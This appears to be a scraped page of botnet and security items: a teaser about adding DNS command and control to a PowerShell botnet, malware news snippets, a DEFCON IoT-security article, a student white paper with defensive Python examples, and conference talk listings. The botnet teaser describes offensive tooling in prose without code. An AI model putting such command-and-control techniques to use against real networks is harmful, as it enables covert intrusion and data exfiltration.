tl;dr: DNS C2 added to my PowerShell botnet, Galvatron. One of my planned extensions to Galvatron was to add DNS command and control, using the very same database and bot commands. This would provide yet another avenue to egress out of the network. And the best part? The egress traffic is written into actual DNS requests […]
#OWASP SQL Injection and Other Flaws in VOlk-Botnet 4 0 Allow Victims to - Apparently, a remote attacker could http://tco/JXPsTdlO
2012-10-10 14:25:30 - Netw0rkSecurity : #OWASP SQL Injection and Other Flaws in VOlk-Botnet 4 0 Allow Victims to - Apparently, a remote attacker could http://tco/JXPsTdlO
Apple publishes support page for Flashback malware, is working on a fix
After the Flashback / Flashfake Mac trojan was exposed by Russian site Dr. Web, Apple has finally responded by publishing a support page about the issue and promising a fix. If you haven't heard by now, the malware exploits a flaw in the Java Virtual Machine, which Oracle pushed a fix for back in February, but Apple didn't patch until a botnet consisting of as many as 650,000 Macs was identified on March 4th. Antivirus maker Kaspersky has confirmed the earlier findings, and released a free tool affected users can run to remove the trojan from their computers. Other than the update already delivered for computers running OS 10.6 and 10.7, Apple recommends users on 10.5 and earlier disable Java in their browser preferences. What isn't mentioned, however, is when its fix is incoming or any timetable on its efforts with international ISPs to cut off the IP addresses used by the network. This is not the first time Macs have fallen prey to malware and, as their market share grows, will likely not be the last, so don't think just opting for OS X is automatically keeping you a step ahead security-wise. Check the links below for more information about what the malware does, and how to get rid of it.
Hackers fall back on old techniques, according to Cisco's tenth security report
Cybercriminals are falling back on classic attack methods to break into companies' computers and networks. In Cisco's tenth annual security report (ACR), adware and spam, among other things, are peaking. Almost two out of three e-mails are spam messages, of which almost 10 percent also contain malware. Driven by botnets, spam is back at its 2010 level.
Bank-Busting Jihadi Botnet Comes Back To Life. But Who Is Controlling It This Time?
The powerful botnet Brobot spent almost a year attacking American financial institutions before disappearing as quickly as it appeared. For the last 12 months, it looked as if this dangerous cyber-threat had been defeated for good. Now Brobot is back, security experts have revealed, and it looks as if it [...]
World's Leading Hackers Explain Why You Don't Want Huge Tech Companies Controlling Everything in Your House
The internet of things is a way to extract wealth from your everyday life.

Is the Internet of Things the next big productivity leap in modern times? Or is it, as it was commonly referred to at DEFCON 25, the Internet of Sh*t?

William Sabin, who describes himself as an “avid trader,” is effusive in his enthusiasm for these new technological developments. In an article evaluating the prospects of General Electric he writes, “The Internet of Things is the most exciting play and why I like GE as much as I do—connecting people, data and machines.” But the security-conscious crowd at DEFCON 25 are not fans.

The buzz word for these devices is “smart,” but what exactly is the Internet of Things? Joe Rozner, a software engineer and featured speaker at DEFCON 25, defines the Internet of Things (IoT) as “everyday devices that are connected to the internet to add functionality.”

The term was coined in 1999 by Kevin Ashton, a British technology pioneer at MIT. But it was presciently forecast by inventor and futurist Nikola Tesla in 1926, “When wireless is perfectly applied the whole earth will be converted into a huge brain … and the instruments through which we shall be able to do this will be amazingly simple ... A man will be able to carry one in his vest pocket."

The first smart device—a toaster that could be turned on and off over the internet—was developed for an earlier tech convention in 1990. Why you need to turn your toaster on and off over the internet is unclear, but in 2017 the list of these programmable objects has expanded exponentially. “Every single device that's being put in your home probably has a computer in it now,” says Christopher Grayson, a security expert and red-team hacker currently working for Snapchat. He lists water bottles, locks and even a WiFi slow cooker as just a few of the items that are being networked.

The Internet of Sh*t Twitter feed rolls out information about these devices, tweeting horror stories about a woman stranded in the country in a smart rental car that won't start without a network. The Twitter account relays a constant stream of weird products—like toilets that glow in the dark—and anecdotes of discomfort, like lightbulbs that have to be reprogrammed before they will turn off and let you go to bed. More dangerously, there is a phone that keeps rebooting when someone is trying to call the fire department.

Grayson says one issue is that many of these companies are small startups trying to move quickly and they don't want to slow down to install more robust security. “The ones that come from big vendors, like Google and Amazon, they are definitely going through security audits, but the vast majority of these devices are just crappy little computers put together by some boot-strap start-up—[and] they haven't actually gotten any of it audited. So generally speaking the security posture of these devices is horrid.”

This turns out to be a problem.

Internal and External Intrusions

In October of 2016 a company called Dyn received tens of millions of attacks from these everyday devices like routers, security cameras and DVRs. Those attacks disrupted many of the major websites that Dyn supported including Twitter, PayPal, Spotify, Netflix, the New York Times and the Wall Street Journal.

Security researchers speculate that these attacks are merely probing around, ahead of larger attacks, and Grayson agrees. When asked if he is anticipating more of these, he says quickly, “Oh, everybody is!”

Unfortunately, massive organized botnet attacks are not the only problem with IoT devices. Not only are they a potential entry point for unwanted intrusion into your home, they are also extruding private information from your home. Companies are acknowledging that they have plans to monetize the data they are collecting from these smart objects. The Internet of Sh*t site quotes the maker of a fridge saying, “We didn’t make a fridge initially to make a ton of money, but in a year or two, it can make revenue, absolutely.” That's one reason the trader William Sabin is so bullish on GE.

One of the fascinating contradictions about the IoT business model that the site points out is that these networked objects are not profitable. They ultimately cost too much to maintain, and so the companies who make them are of necessity exploring alternate revenue streams. Your data is a ready-made product to fill this void.

How will they monetize it? In the case of a fridge, for example, they could sell information about what time and how often you shop. Maybe you always make a grocery run on Saturday, ads that you see on Facebook on Friday night might be more effective. There would be companies willing to pay for that information. It may be useful for consumers to have ads that pop up the day before they shop—there are convenient aspects to machines knowing everything about us. But there are downsides as well.

The release by hackers of the private data of tens of millions of Ashley Madison customers in July of 2015 resulted in blackmail, divorces and even suicides. The company specializes in arranging affairs for married individuals, and when the complete database was released online by hackers, “people found they could be identified not only by their names and their addresses but also by their height, their weight, even their erotic preferences.” The Ashley Madison data was not gathered from smart objects, but it is a pointed reminder of the dangerous combination of massive amounts of personal data combined with poor security.

No Good Answers Right Now

That combination in relation to the Internet of Things is something that is worrying a lot of people in the InfoSec sector. Rozner says he is not aware of any legislation that would require companies to implement strong security protocols. Grayson says, “There are a lot of startups around it. There is no good answer to IoT security right now.” He recommends having a completely different network for all of your smart devices. Rozner says that is something that is typically suggested at the corporate level. He says it may be daunting for most users to manage such a complex setup, “but overall it is a good idea.”

Alina Selyukh, NPR's tech blogger, recommends changing passwords to help with IoT security, and making them strong. Security experts recommend using a string of words or a phrase that has a combination of upper and lower case characters, symbols and numbers. One security website warns that as more people turn to phrases, hackers are focusing on them more, so it's best that your phrase be random and not one that is commonly used. For passwords to be resistant to the latest hacker technology it is possible they need to be at least 23 characters long. Edward Snowden says that an eight-character password can be cracked in under one second.

18 Routers Hacked

What's more fun than hacking into things? Hacking into things while winning serious street cred and cash. DEF CON 25's IoT Village challenged hackers to pit their skills against the security of Small Office/Home Office routers. Eighty-six teams competed to discover the 0-day (undisclosed) vulnerabilities that were required to earn points. Teams were up late into the night, sometimes all night testing their skills against the security provisions that companies had put in place. Ultimately all the routers in the contest fell victim to the hackers. Independent Security Evaluators, the company that organizes the village, claims that the winning team Wolf Pack was able to exploit all 18 routers in play, capturing the “flag” and the $500 prize. Is your router one of the ones they hacked into? You might want to check.

IoT Village says that over the years they have exposed 113 vulnerabilities in connected devices. Melanie Ensign, a volunteer who works with the Con, said that they have informed researchers and device manufacturers about these issues, but clarified that just because a flaw has been exposed does not mean it has been fixed. She said “device manufacturers are notoriously difficult to work with on patching” adding that not every vulnerability can be fixed with a software update. IoT Village does not make these security flaws public for obvious reasons.


CR228: DDoS from the IoT botnet
The revolt of the household appliances. Twitter? Broken. Amazon? Not working! All because of an attack that, given its sheer scale, even experts wanted to attribute to intelligence agencies or state-affiliated hackers; in reality, household appliances were behind it. Because the "Internet of Things", consisting of useful devices with …
Information Security
Scenario...
Information Security White Paper

Watch the Information Technology Security for Small Businesses video from the National Institutes of Standards and Technology (NIST): http://www.youtube.com/watch?v=ajwX-7jVLo0&feature=player_embedded

Then write an information security white paper that can be used to market your firm’s security consulting services to small businesses in the Washington, DC, area. Your white paper must:

Be concise—no more than three pages long.

Provide a general explanation of the business need for information security (protection measures) even in the smallest of businesses (e.g., protect against loss of profit, damage to company’s reputation, costs of litigation, etc.).
Explain information security threats (risks) and vulnerabilities in plain English to small business owners who, while experts in their own business areas, have limited knowledge of computers, networks, and software.
Explain the following key concepts as part of the threats (risks) and vulnerabilities discussion:
confidentiality
integrity
availability
non-repudiation
authentication
authorization

Recommend technologies, processes, and policies that can be used to solve or mitigate one of the following common information security threats (risks):
data breach and/or data theft (confidential client information)
denial-of-service (DOS) attacks
insider theft of intellectual property
deliberate corruption of electronic files (hacker attack or malicious insider) including virus/worm infections

Discuss the impact or results that can be expected:
costs and benefits of effective protection measures
costs and penalties of ineffective or nonexistent protection measures

Proposed solution...

All organizations, whether big or small, operate on data, whether a customer information database or a business operations database. In this document, we provide a general explanation of the business need for information security even in the smallest of businesses; explain information security threats, risks, and vulnerabilities; and explain the concepts of confidentiality, integrity, availability, non-repudiation, authentication, and authorization. This document also recommends technologies, processes, and policies that can be used to solve or mitigate denial-of-service (DoS) attacks, which can halt a business operation, and finally discusses the costs and benefits of effective protection measures and the costs and penalties of ineffective or nonexistent protection measures.

A workplace or business has many assets, technological or not, that contribute to its daily operation. For the most part, even the non-technological assets are to some degree controlled through information technology. Sometimes those assets are physical, such as workstations and servers, and sometimes non-physical, such as data. Either type of asset is indispensable and must be secured for the business to continue operating, hence the importance of an information security policy. An information security policy should fulfill many purposes. It should: protect people and information; set the rules for expected behavior by users, system administrators, management, and security personnel; authorize security personnel to monitor, probe, and investigate; define and authorize the consequences of violation; define the company's consensus baseline stance on security; help minimize risk; and help track compliance with regulations and legislation (Diver, 2006). Information security policies are also necessary to regulate employees' behavior in the use of a company's electronic communication assets, and at the same time they define the thresholds for acceptable and unacceptable system security requirements that must be met.

As hackers take the fight online, organizations' data face more and more security threats. Some of the emerging threats identified include malware, botnets, cyber warfare, and the cyber crime economy (Georgia Tech Information Security Center, 2008). For an organization to stay abreast of these information security threats and vulnerabilities, it should continuously implement information security measures to prevent and counter them. To do so, an organization should implement security policies in addition to technical controls such as firewalls and antivirus programs. The security properties that such measures are meant to uphold are confidentiality, integrity, availability, non-repudiation, authentication, and authorization.

Confidentiality consists of protecting an information asset by providing access only to authorized users while unauthorized users are denied access. In other words, confidentiality is the privacy of an asset, and can specifically be defined as which people, under what conditions, are authorized to access an asset (Purdue University, 2004).

Integrity, on the other hand, consists of putting controls in place to ensure that data does not get altered in transit: data that was input should come out the same way. On a more restrictive view, however, integrity of an information system includes only preservation, without corruption, of whatever was transmitted or entered into the system, right or wrong (University of Miami, 2008).

Availability represents the requirement that an asset be accessible to an authorized person, entity, or device (Purdue University, 2004).

Non-repudiation can be defined as the ability to deny a false rejection or refusal of an obligation with irrefutable evidence (Ainsworth, 2000). The same source provided an excellent example of this matter. It explains the use of non-repudiation by the United States Post Office, USPS. The example states: “A perfect example of a non-repudiation of submission is the service that the USPS provides when you send a registered letter. You are given a receipt that contains an identification number for that piece of mail. If the recipient never receives the mail and claims that you have not sent it, the receipt is the proof that provides the non-repudiation of submission. If the USPS has the receipt of delivery that contains the recipient’s signature, they have provided the proof for the non-repudiation of delivery service. The USPS provides the non-repudiation of transport service by acting as the TTP in the transaction” (Ainsworth, 2000).

Authentication is the mechanism by which systems securely identify their users; it answers the questions of who the user is and whether the user really is who he claims to be (Duke University). Authorization, by contrast, is the mechanism by which a system determines what level of access a particular authenticated user should have to the secured resources the system controls (Duke University). The two are separate checks: a user who has proven their identity may still be denied a given action. As stated earlier, information security is necessary to mitigate security risks.
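The distinction is easiest to see in code. The following is an added worked example, not code from the Duke University source cited above: a password check (authentication) followed by a separate role-based permission check (authorization). The user store, the roles and the resource/action policy are assumptions made up for the example.

```python
"""Authentication versus authorization, as a small worked example.

Added illustration, not code from the Duke University source cited above.
The user store, the roles and the resource/action policy are assumptions
made up for the example.
"""
import hashlib
import hmac
import os

KDF_ROUNDS = 100_000  # PBKDF2 iteration count; an assumption, tune for your hardware


def make_password_record(password: str) -> dict:
    """Store a salted PBKDF2-HMAC-SHA256 hash, never the password itself."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ROUNDS)
    return {"salt": salt, "hash": digest}


# Constructed user store (assumption): who the users are and which roles they hold.
USERS = {
    "alice": {"pw": make_password_record("correct horse"), "roles": {"finance"}},
    "bob": {"pw": make_password_record("battery staple"), "roles": {"volunteer"}},
}

# Constructed policy (assumption): which roles may do which action on which asset.
POLICY = {
    ("donor_db", "read"): {"finance", "volunteer"},
    ("donor_db", "write"): {"finance"},
}


def authenticate(username: str, password: str):
    """Answer 'is this user really who they claim to be?'.

    Returns the username on success, None otherwise. The KDF is always run and
    the comparison is constant-time, so an unknown user and a wrong password
    cost the same and cannot be told apart by timing.
    """
    rec = USERS.get(username)
    salt = rec["pw"]["salt"] if rec else bytes(16)
    expected = rec["pw"]["hash"] if rec else bytes(32)
    got = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ROUNDS)
    if rec is not None and hmac.compare_digest(got, expected):
        return username
    return None


def authorize(username: str, resource: str, action: str) -> bool:
    """Answer 'what may this (already authenticated) user do?'.

    A user holding none of the roles listed for the (resource, action) pair
    is denied; an unknown pair is denied by default.
    """
    allowed_roles = POLICY.get((resource, action), set())
    return bool(USERS[username]["roles"] & allowed_roles)


def access(username: str, password: str, resource: str, action: str) -> str:
    """Authenticate first, then authorize; the two checks are independent."""
    who = authenticate(username, password)
    if who is None:
        return "denied: authentication failed"
    if not authorize(who, resource, action):
        return "denied: not authorized"
    return "granted"


if __name__ == "__main__":
    print(access("alice", "correct horse", "donor_db", "write"))  # granted
    print(access("bob", "battery staple", "donor_db", "write"))   # denied: not authorized
    print(access("bob", "wrong password", "donor_db", "read"))    # denied: authentication failed
```

Bob authenticates successfully but is still refused write access; that refusal is an authorization decision, not an authentication failure, and the two should be logged and handled separately.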

Another example of a risk or threat that an organization could fall victim to is the denial-of-service (DoS) attack. A DoS attack floods a network or service with traffic in order to prevent access to a web page, email, or other online service. Although there is no definitive way to prevent such attacks, steps can be taken to reduce their effects: installing and maintaining anti-virus software, installing a firewall and configuring it to restrict traffic coming into and leaving the computer, following good security practices for distributing email addresses, and applying email filters to help manage unwanted traffic (McDowell, 2009). Note that these steps mostly keep an organization's own machines from being recruited into the botnets that launch such attacks; whether a large flood can be absorbed depends on the capacity of the network and its upstream provider.
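Before a firewall rule can restrict flooding traffic, someone has to notice the flood. The following is an added example, not code from the McDowell/US-CERT source cited above: it reads web-server access log lines and flags any source that exceeds a request threshold inside a sliding time window. The Common Log Format, the assumption that each source's lines arrive in time order, and the window and threshold values are all assumptions to be tuned per site; the sample log is constructed.

```python
"""Spot a request flood in web-server access logs.

Added example, not from the McDowell/US-CERT source cited above. It assumes
Common Log Format lines and that each source's lines appear in time order;
the window size and threshold are assumptions to tune per site.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Common Log Format, e.g.
# 203.0.113.7 - - [12/May/2017:10:00:01 +0000] "GET / HTTP/1.1" 200 512
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line: str):
    """Return (ip, timestamp, method, path, status) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path, int(status)


def find_flooders(lines, window_s: int = 10, threshold: int = 20) -> dict:
    """Map each source IP that exceeded `threshold` requests inside any
    `window_s`-second sliding window to its peak count in such a window."""
    recent = defaultdict(deque)  # per-IP timestamps still inside the window
    peak = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # malformed lines are skipped, not trusted
        ip, when = rec[0], rec[1]
        q = recent[ip]
        q.append(when)
        while (when - q[0]).total_seconds() > window_s:
            q.popleft()  # drop timestamps that fell out of the window
        if len(q) > threshold:
            peak[ip] = max(peak.get(ip, 0), len(q))
    return peak


def sample_log():
    """Constructed sample log (not real traffic): one source firing 40 GETs
    in four seconds, one source browsing at a normal pace, one junk line."""
    lines = []
    for sec in range(4):
        lines += [f'203.0.113.7 - - [12/May/2017:10:00:0{sec} +0000] '
                  f'"GET / HTTP/1.1" 200 512'] * 10
    for sec in range(5):
        lines.append(f'198.51.100.4 - - [12/May/2017:10:00:0{sec} +0000] '
                     f'"GET /about HTTP/1.1" 200 2048')
    lines.append("not a log line")
    return lines


def flooders_in_sample() -> dict:
    return find_flooders(sample_log())


if __name__ == "__main__":
    for ip, hits in flooders_in_sample().items():
        print(f"{ip}: {hits} requests within 10 s, candidate for a firewall block")
```

The per-source window is what keeps the ordinary visitor (five requests in five seconds) out of the result while the 40-request burst is reported; a distributed flood from many sources at low individual rates needs an aggregate view on top of this per-IP one.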

Effective protection measures of the kind outlined so far benefit an organization in many ways. They preserve data integrity and ensure that the organization's assets are accessed only by authorized users. Good data allows for good business decisions, built on comparable past data to make projections for the future.

Data that has been altered in transit, or is otherwise bad, can mislead an organization into bad business decisions, erroneous data charts, and bad business projections. Business decisions derived from bad data could result in an unproductive and inefficient company, angry customers, lawsuits, loss of employees, damage to reputation, and even the company's shutdown.

All in all, businesses of all sizes, whether small or big, need to protect their data against potential threats and vulnerabilities. An organization needs to protect its assets by applying the information security measures outlined in this document, and at the same time deploy policies and technical controls to ensure proper use of those assets. As also seen in this document, an organization can remain profitable if it ensures effective protection measures, or be subjected to bad publicity and a potential shutdown if its protection measures are ineffective or nonexistent.

References

Ainsworth, K. (2000, November 8). Non-repudiation – Simple to understand, Difficult to implement. Retrieved July 06, 2011, from Global Information Assurance Certification (GIAC) Web site: www.giac.org

Diver, S. (2006, July 12). Information Security Policy - A Development Guide for Large and Small Companies. Retrieved July 05, 2011, from SANS Institute Web site: sans.org

Duke University. (n.d.). Authentication vs. Authorization. Retrieved July 05, 2011, from Duke University Web site: www.duke.edu

Georgia Tech Information Security Center. (2008, October 15). Emerging Cyber Threats Report for 2009: Data, Mobility and Questions of Responsibility will Drive Cyber Threats in 2009 and Beyond. Retrieved July 06, 2011, from Georgia Tech Information Security Center Web site: www.gtisc.gatech.edu

McDowell, M. (2009, November 4). Understanding Denial-of-Service Attacks. Retrieved July 06, 2011, from United States Computer Emergency Readiness Team (US-CERT) Web site: www.us-cert.gov

Purdue University. (2004, February 23). RASC: Confidentiality, Integrity and Availability (CIA). Retrieved July 05, 2011, from Purdue University Web site: www.itap.purdue.edu

University of Miami. (2008). Confidentiality, Integrity and Availability (CIA). Retrieved July 05, 2011, from University of Miami Web site: www.it.med.miami.edu
          Washington Post Accidentally Exposes Their Anonymous Botnet Hacker        
Thanks to photo metadata, he’s a sitting duck.
          MyDoom botnet        

This graph visualization shows the propagation of malware through a deliberately infected computer network. Twelve machines in the network were infected to see how the traffic spread to other machines. Over 7,800 machines were included in the dataset.
The whole network in a single chart: yellow links indicate benign traffic; red links indicate traffic containing at least one infected packet. Nodes are sized by traffic volume.
Data taken from MyDoom-A.tar.gz.
Image generated with KeyLines.


          Server Control via Instant Messaging        

We examine the use of XMPP to manage hundreds of servers in various environments.


Cloud infrastructures have provided a great deal of power and versatility, but come at a cost of management overhead. In many cases, a node in a cloud infrastructure has no guarantee of being there at any given moment, has an indeterminable spin-up time, and has no way of determining a priori where it will be. These make it hard to coordinate work across the nodes.

The typical approach for these setups is to provide an HTTP based registrar. While that works in many cases, the lack of bidirectional communication introduces a bit of ambiguity. What is happening between checkins? Does a node need to unregister itself? What happens when a node goes down?

Botnet shepherds have long dealt with problems similar to those cloud shepherds are dealing with now. A botnet node can go down at any time, there is no way to determine when a node will come into the botnet, and botnet nodes come from all over the place. Currently, the primary mechanism that botnet shepherds use to control their networks is IRC channels. While the primary appeals have been the low barrier to entry, the always-on messaging infrastructure, and the inability to lock down the channel, this approach provides an efficient way to coordinate activity in an environment with the above issues with little overhead.

Given the similarities between managing a botnet herd and managing a cloud herd, why not use the same management mechanisms that botnets use for more above the board purposes? How well do instant messaging infrastructures work for cloud infrastructures?

In this talk, we examine how we can use the botnet herding techniques to manage a large host of servers in a couple of scenarios. We will look at using XMPP as a transport mechanism for a traditional hosting environment as well as a cloud environment.

Speaker: Chris McEniry
          Here Are Some New Ideas for Fighting Botnets        
It's a tricky problem, so solutions have to be carefully thought out.
          Derbycon 4 Videos        
Link:http://www.irongeek.com/i.php?page=videos/derbycon4/mainlist
These are the videos of the presentations from Derbycon 2014. Big thanks to my video jockeys Skydog, Sabrina, Some Ninja Master, Glenn Barret, Dave Lauer, Jordan Meurer, Brandon Grindatti, Joey, Steven, Branden Miller, Joe, Greg and Night Carnage (and maybe the speakers too I guess).
 

Welcome to the Family – Intro

Johnny Long (Keynote) – Hackers saving the world from the zombie apocalypse

How to Give the Best Pen Test of Your Life (Keynote) – Ed Skoudis

Adaptive Pentesting Part Two (Keynote) – Kevin Mitnick and Dave Kennedy

If it fits – it sniffs: Adventures in WarShipping – Larry Pesce

Abusing Active Directory in Post-Exploitation – Carlos Perez

Quantifying the Adversary: Introducing GuerillaSearch and GuerillaPivot -Dave Marcus

A Year in the (Backdoor) Factory – Joshua Pitts

Ball and Chain (A New Paradigm in Stored Password Security) – Benjamin Donnelly and Tim Tomes

Et tu – Kerberos? – Christopher Campbell

Advanced Red Teaming: All Your Badges Are Belong To Us – Eric Smith

Bypassing Internet Explorer's XSS Filter – Carlos Munoz

Threat Modeling for Realz – Bruce Potter

A Guided Tour of the Internet Ghetto :: Introduction to Tor Hidden Services – Brent Huston

Red Teaming: Back and Forth – 5ever – Fuzzynop

How not to suck at pen testing – John Strand

Mainframes – Mopeds and Mischief; A PenTesters Year in Review – Tyler Wrightson

The Multibillion Dollar Industry That's Ignored – Jason Montgomery and Ryan Sevey

Code Insecurity or Code in Security – Mano 'dash4rk' Paul

C3CM: Defeating the Command – Control – and Communications of Digital Assailants – Russ McRee

So You Want To Murder a Software Patent – Jason Scott

Leonard Isham – Patching the Human Vulns

Burp For All Languages – Tom Steele

Passing the Torch: Old School Red Teaming – New School Tactics – David McGuire and Will Schroeder

I Am The Cavalry: Year [0] – Space Rogue and Beau Woods

University Education In Security Panel – Bill Gardner (@oncee) – Ray Davidson – Adrian Crenshaw – Sam Liles – Rob Jorgensen

What happened to the 'A'? – How to leverage BCP/DR for your Info Sec Program – Moey

Securing Your Assets from Espionage – Stacey Banks

Subverting ML Detections for Fun and Profit – Ram Shankar Siva Kumar – John Walton

Secrets of DNS – Ron Bowes

Snort & OpenAppID: How to Build an Open Source Next Generation Firewall – Adam Hogan

GET A Grip on Your Hustle: Glassdoor Exfil Toolkit – Parker Schmitt – Kyle Stone (essobi) – Chris Hodges (g11tch)

DNS-Based Authentication of Named Entities (DANE): Can we fix our broken CA model? – Tony Cargile

Exploiting Browsers Like A Boss w/ WhiteLightning! – Bryce Kunz

Real World Intrusion Response – Lessons from the Trenches – Katherine Trame and David Sharpe

Application Whitelisting: Be Careful Where The Silver Bullet Is Aimed – David McCartney

NeXpose For Automated Compromise Detection – Luis "connection" Santana

A girl – some passion – and some tech stuff – Branden Miller and Emily Miller

InfoSec – from the mouth of babes (or an 8 year old) – Reuben A. Paul (RAPstar) and Mano Paul

Why Aim for the Ground? – Teaching Our School Kids All of the Right Computer Skills – Phillip Fitzpatrick

NoSQL Injections: Moving Beyond 'or '1'='1' – Matt Bromiley

SWF Seeking Lazy Admin for Cross Domain Action – Seth Art

Planning for Failure – Noah Beddome

The Social Engineering Savants – The Psychopathic Profile – Kevin Miller

Hiding the breadcrumbs: Forensics and anti-forensics on SAP systems – Juan Perez-Etchegoyen

You're in the butter zone now baby. – Chris Scott

Making BadUSB Work For You – Adam Caudill – Brandon Wilson

PassCrackNet: When everything else fails – just crack hashes. – Adam Ringwood

Vulnerability Assessment 2.0 – John Askew

Social Engineering your progeny to be hackers – Sydney Liles

A Brief History of Exploitation – Devin Cook

Hunting Malware on Linux Production Servers: The Windigo Backstory – Olivier Bilodeau

Interceptor: A PowerShell SSL MITM Script – Casey Smith

Egypt – More New Shiny in the Metasploit Framework

The Human Buffer Overflow aka Amygdala Hijacking – Christopher Hadnagy

Shellcode Time: Come on Grab Your Friends – Wartortell

The Internet Of Insecure Things: 10 Most Wanted List – Paul Asadoorian

DDoS Botnet: 1000 Knives and a Scalpel! – Josh Abraham

wifu^2 – Cameron Maerz

Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades – Tim Medin

Attack Paths: Breaking Into Infosec From IT Or Other Totally Different Fields – Eve Adams and Johnny Xmas

How to Secure and Sys Admin Windows like a Boss. – Jim Kennedy

Red white and blue. Making sense of Red Teaming for good. – Ian Amit

Around the world in 80 Cons – Jayson E. Street

Mirage – Next Gen Honeyports – Adam Crompton and Mick Douglas

Active Directory: Real Defense for Domain Admins – Jason Lang

The Wireless World of the Internet of Things – JP Dunning ".ronin"

Hackers Are People Too – Amanda Berlin (Infosystir)

Ethical Control: Ethics and Privacy in a Target-Rich Environment – Kevin Johnson and James Jardine

The Road to Compliancy Success Plus Plus – James Arlen

Are You a Janitor – Or a Cleaner – John Stauffacher and Matt Hoy

Practical PowerShell Programming for Professional People – Ben Ten (Ben0xA)

GROK – atlas

How building a better hacker accidentally built a better defender – Casey Ellis

Exploring Layer 2 Network Security in Virtualized Environments – Ronny L. Bull – Dr. Jeanna N. Matthews

Hardware Tamper Resistance: Why and How? – Ryan Lackey

Making Mongo Cry-Attacking NoSQL for Pen Testers – Russell Butturini

Step On In – The Waters Fine! – An Introduction To Security Testing Within A Virtualized Environment – Tom Moore

Give me your data! Obtaining sensitive data without breaking in – Dave Chronister

Third Party Code: FIX ALL THE THINGS – Kymberlee Price – Jake Kouns

Just What The Doctor Ordered? – Scott Erven

Powershell Drink the Kool-Aid – Wayne Pruitt – Zack Wojton

powercat – Mick Douglas

Macro Malware Lives! – Putting the sexy back into MS-Office document macros – Joff Thyer

Girl… Fault Interrupted – Maggie Jauregui

Human Trafficking in the Digital Age – Chris Jenks

Cat Herding in the Wild Wild West: What I Learned Running A Hackercon CFP – Nathaniel Husted

How to Stop a Hack – Jason Samide

We don't need no stinking Internet. – Greg Simo

Hacking the media for fame and profit - Jen Ellis and Steve Ragan

Rafal Los – Things Being a New Parent of Twins Teaches You About Security

ZitMo NoM – David Schwartzberg

Penetrate your OWA – Nate Power

RavenHID: Remote Badge Gathering -or- Why we sit in client bathrooms for hours – Lucas Morris – Adam Zamora

Interns Down for What? – Tony Turner

i r web app hacking (and so can you!) – Brandon Perry

Building a Modern Security Engineering Organization – Zane Lackey

Information Security Team Management: How to keep your edge while embracing the dark side – Stephen C Gay

5min web audit: Security in the startup world – Evan Johnson

Project SCEVRON: SCan EVrything with ruby RONin – Derek Callaway

Soft Skills for a Technical World - Justin Herman

Gone in 60 minutes a Practical Approach to Hacking an Enterprise with Yasuo – Saurabh Harit and Stephen Hall

Snarf – Capitalizing on Man-in-the-Middle – Victor Mata – Josh Stone

Electronic locks in firearms – Oh My! – Travis Hartman

The Achilles Heel Of The American Banking System - Brandon Henery and Andy Robins

It's Not Easy Being Purple – Bill Gardner – Valerie Thomas – Amanda Berlin – Eric Milam – Brandon McCann – Royce Davis

Control Flow Graph Based Virus Scanning – Douglas Goddard

Ok – so you've been pwned – now what? – Jim Wojno

Everybody gets clickjacked: Hard knock lessons on bug bounties – Jonathan Cran

Are you a Beefeater – focused on protecting your crown jewels? – Jack Nichelson

Dolla Dolla Bump Key – Chris Sistrunk

What Dungeons & Dragons Taught Me About INFOSEC – Joey Maresca (l0stkn0wledge)

Gender Differences in Social Engineering: Does Sex Matter? – Shannon Sistrunk – Will Tarkington

Introduction to System Hardening – Eddie David

Hacking your way into the APRS Network on the Cheap – Mark Lenigan

Building a Web Application Vulnerability Management Program – Jason Pubal

Fighting Back Against SSL Inspection – or How SSL Should Work – Jacob Thompson

Physical Security: From Locks to Dox – Jess Hires

Am I an Imposter? – Warren Kopp

Call of Community: Modern Warfare – Ben Ten and Matt Johnson

The Canary in the Cloud – Scot Bernerv

          Derbycon 3.0 Videos Tracks 3, 4, 5 & Stable Talks Posted        
Link: http://www.irongeek.com/i.php?page=videos/derbycon3/mainlist

Track 3 (Teach Me)
It's Only a Game: Learning Security through Gaming – Bruce Potter
Ooops – Now What? :: The Stolen Data Impact Model (SDIM) – Brent Huston
Anti-Forensics: Memory or something – I forget. – int0x80
The Mysterious Mister Hokum – Jason Scott
Appsec Tl;dr – Gillis Jones
DIY Command & Control For Fun And *No* Profit – David Schwartzberg
IPv6 is here (kind of) – what can I do with it? – Dan Wilkins
Dancing With Dalvik – Thomas Richards
Big Hugs for Big Data – Davi Ottenheimer
Antivirus Evasion: Lessons Learned – thelightcosine
Jared DeMott – Is Auditing C/C++ Different Nowadays?
Getting Schooled: Security with no budget in a hostile environment – Jim Kennedy
Browser Pivoting (FU2FA) – Raphael Mudge
Taking the BDSM out of PCI-DSS Through Open-Source Solutions – Zack Fasel & Erin “SecBarbie” Jacobs
John Strand – Hacking Back – Active Defense and Internet Tough Guys
An Encyclpwnia of Persistence – Skip Duckwall & Will Peteroy
Your Turn! – Johnny Long – HFC
Practical File Format Fuzzing – Jared Allar
Surviving the Dead – Christopher ‘EggDropX’ Payne
How can I do that? Intro to hardware hacking with an RFID badge reader – Kevin Bong
A SysCall to ARMs – Brendan Watters
The Netsniff-NG Toolkit – Jon Schipp
Why Dumpster Dive when I can pwn right in? – Terry Gold

Track 4 (The 3-Way)     
Pigs Don’t Fly – Why owning a typical network is so easy – and how to build a secure one. – Matt “scriptjunkie” Weeks
Finding The Signal in the Noise: Quantifying Advanced Malware – Dave Marcus
Applying the 32 Zombieland Rules to IT Security – Larry Pesce
Windows 0wn3d By Default – Mark Baggett
Android 4.0: Ice Cream “Sudo Make Me a” Sandwich – Max Sobell
Attacking the Next Generation Air Traffic Control System; Hackers – liquor and commercial airliners. – Renderman
Antivirus Evasion through Antigenic Variation (Why the Blacklisting Approach to AV is Broken) – Trenton Iveys
Hello ASM World: A Painless and Contextual Introduction to x86 Assembly – nicolle neulist (rogueclown)
SQL injection with sqlmap – Conrad Reynolds CISA
